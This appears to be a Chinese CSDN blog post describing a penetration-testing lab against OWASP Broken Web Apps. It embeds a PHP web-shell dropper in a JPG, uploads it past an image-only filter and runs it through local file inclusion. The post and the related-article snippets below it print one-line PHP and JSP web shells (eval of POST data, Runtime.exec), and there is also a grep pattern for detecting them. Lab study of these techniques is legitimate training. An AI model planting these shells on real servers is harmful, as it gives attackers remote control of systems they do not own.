高安全级别文件上传结合文件包含漏洞渗透web实验

最新推荐文章于 2024-04-07 17:13:35 发布
最新推荐文章于 2024-04-07 17:13:35 发布
阅读量628 收藏 2
点赞数
分类专栏: 笔记 实验 文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42401745/article/details/107826005
版权
本文介绍了一次针对中低安全级别文件包含漏洞的渗透实验。实验中,尽管网站限制了只能上传jpg图片,但通过在图片中注入木马并利用本地文件包含漏洞,成功执行了隐藏的木马,最终获取了web shell。实验过程涉及文件包含原理、图片木马注入、文件上传及利用文件包含漏洞执行木马。
摘要由CSDN通过智能技术生成

中低安全级别的文件包含漏洞利用

实验环境

kali
owasp_broken_web_apps
windows 10

实验工具

中国菜刀,burpsuit,图片木马插入工具,一句话木马

实验内容:
打开owasp_broken_web_apps的网址并将文件上传漏洞安全级别为高级即只可以上传,后缀为jpg格式的图片,无法上传php文件,也无法通过代理绕过,(即使通过代理修改后缀绕过,一句话木马功不能得到发挥,不可执行删改等操作),此时web网站正好有本地文件包含漏洞。则可以利用此漏洞将隐藏在图片中的木马执行。

文件包含:
是一个方便与开发人员缩减代码量的一种方法。直接将另一个文件调用过来。

实验过程:
在网络上下载一张小图片,将器拖拽到edjpgom工具上,打开工具后,在空白处写上小马:
<?fputs(fopen("shell66.php","w"),'<?php eval($_POST[moyi]);?>') ?>
点击OK注入图片。
在这里插入图片描述将刚刚注入的图片上传到目标网站:
在这里插入图片描述文件上传后,我们使用网站后台,

最低0.47元/天 解锁文章
墨衣旅人
关注
专栏目录
文件包含漏洞和上传漏洞
sunnygao的博客
09-29 3186
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马 sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件 字段数保持一致,可以用其他数据凑数补上。 文件包含漏洞 PHP文件包含漏洞文件包含:共用函数写到单个文件中,然后多次调用, ​ 文件包含漏洞:包含的文件可以被替换成恶意文件。 PHP提供了四个文件包含函数,分别是include() 找不到被包含的文件只会产生警
Web安全渗透学习-文件上传漏洞
weixin_43468445的博客
07-12 1925
Web安全渗透-学习笔记-文件上传漏洞 文件上传漏洞原理 所谓文件上传漏洞,就是利用上传相应的可执行脚本文件到服务器上,使我们能够获得服务器的操作权限。可执行的脚本文件有很多,这里就拿PHP的一句话木马举例: <?php @eval($_POST[value]);?> 这里面的 value 可以换成其他任意的,这个表示连接被植入可执行代码服务器的密码。我们在把它保存为一个php文件后,...
web渗透测试实战-DVWA-文件上传漏洞(High-高级),菜刀工具-蚁剑
qq_39174983的博客
12-30 6223
本文将描述小白本白在进行DVWA-文件上传漏洞高级)实战时的完成步骤,以及所遇到的问题
上传漏洞与本地文件包含结合实验
weixin_43696861的博客
05-29 286
一、了解不安全文件上传漏洞-getimagesize() 伪造包含漏洞的图片文件 二、将含有漏洞的图片上传至服务器 1.更改地址 2.生成脚本文件至服务器 三、启动脚本 显示出所有系统信息 ...
文件包含
weixin_30241919的博客
08-02 134
文件包含函数 (1)require():跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。(2)include():包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。(3)require_once():只包含一次(4)include_once():这个函数跟include函数作用几乎相同,只是他在导入...
安全级别可信操作系统实现研究.docx
10-03
"安全级别可信操作系统实现研究" 安全级别可信操作系统是指能够满足对系统安全性、可靠性和可信性要求的一种操作系统。它具有度的安全性和稳定性,可以在各种复杂环境中对数据进行加密和保护,同时也可以对...
安全环境包高级渗透测试第二版20163.epub.7z
06-30
安全环境包高级渗透测试第二版20163.epub.7z
四川电信安E900V21E-S905l3B-MT7668线刷包等12个文件
03-22
线刷包通常包含固件文件,用于通过USB连接对设备进行系统级别的刷机操作,修复可能出现的软件问题或者升级到新版本。 线刷过程涉及到的知识点包括: 1. **固件刷机**:固件刷机是一种对电子设备操作系统进行升级或...
EC6110-T(安) 分区表
11-07
EC6110-T(安) 分区表
文件上传&文件包含漏洞
lunan的博客
04-22 510
一句话木马的书写格式 <?php @eval($_POST["myshell"]) ?> 正则过滤 egrep -R 'eval\(\$_POST\[' /var/www/dvwa -R是表示正则展开,egrep表示调用正则表达式,/var是路径 自定义过滤 fgrep -R 'eval($_POST[' /var/www fgrep表示自定义格式过滤 连接远程主机 ssh 192.168.13.135 ...
DVWA上传漏洞实践(不同级别)
过客璇璇的博客
03-24 5205
DVWA上传漏洞实践(不同级别) Low级别 先上传一个php文件试试 发现直接就上传成功了 应该是没有对文件格式做任何过滤吧 打开源码看一下 <?phpif(isset($_POST['Upload'])){ //Wherearewegoingtobewritingto?$target_path=DVWA_WEB...
文件上传文件包含漏洞
m0_51313985的博客
03-30 769
day2 什么是文件上传文件上传指用户在相应的权限下上传正常的图片或者文件内容。 什么是文件上传漏洞? 简单来说,文件上传漏洞指用户超过其权限,绕过限制上传了不允许上传的内容,这里上传的文件可以是木马、病毒、恶意脚本或者webshell等 最常见的一个webshell就是php一句话木马: <?php @eval($_POST[1]); ?> jsp: <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
文件上传漏洞文件包含漏洞渗透
qq_41838217的博客
12-07 1250
文件上传漏洞渗透 原理:利用网站文件上传对文件类型、后缀等未检测的漏洞进行渗透攻击。 目的:将木马脚本上传至网站后台服务器获取增删改权限,删库跑路。 工具:kali, OWASP(Open Web Application Security Project Broken Web Applications),burpsuite,China Chopper 漏洞分析: if (($uploaded_type == "image/jpeg") && ($uploaded_size <
渗透文件包含漏洞
Jian Sun_的博客
05-16 1393
文件包含漏洞介绍 文件包含故名思意就是文件中包含其他的文件,这也许是开发人员为了减轻开发量从而在代码设计的时候包含了某些文件,更甚者是直接包含了类似*.php、*.*这种文件。首先文件包含这个行为是正常的,因为在开发的途中难免会遇到有重复的代码等需要设计,而通过文件包含就可以减轻一定的工作量,所以文件包含本身是正常的。但是需要注意在文件包含行为中的一些配置,如果是PHP的话,那么在PHP安装目录下的php.ini配置文件中可以对文件包含的一些配置进行相关的设置: php.ini的一些配置信息查看 文件包
web安全-7-文件上传文件包含漏洞
最新发布
qq_57410330的博客
04-07 1093
内容为文件上传漏洞文件包含漏洞
OWASP-文件上传漏洞简述(低中
qq_55803921的博客
11-04 1118
OWASP-文件上传漏洞简述:OWASP-文件上传漏洞(低级):OWASP-文件上传漏洞(中级):OWASP-文件上传漏洞高级):webshell文件包含: 注:仅作学习使用 OWASP-文件上传漏洞(低级): 首先上传一个jgp图片,测试它上传成功的反应: 发现上传成功是这样的: 然后试试上传其他类型的文件,此处是一个html的文件,发现可以上传成功: 再试试上传一句话木马可不可以: 上传成功哈: 访问一下自己的文件(靶场不同于网站,其他网站得自己找路径): 虽然没看显示东西,但是东西就在这里
基于owasp实现文件包含漏洞
M_Young的博客
12-05 437
文件包含渗透 <?fputs(fopen(‘‘shell.php’’, ‘‘w’’),‘<?php eval($_POST[pass]);?>’)?> 注:打开shell.php的文件,并写入<?php eval($_POST[pass]);?> 就在本地生成了一句话木马,然后就可以通过菜刀这样的工具连接木马。 本地文件包含LFI:(首先需要上传文件,才能修改=后面的文件) 192.168.40.108/dvwa/vulnerabilities/fi/index.php
文件上传学习笔记
m0_66618018的博客
10-26 1879
文件上传学习笔记
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值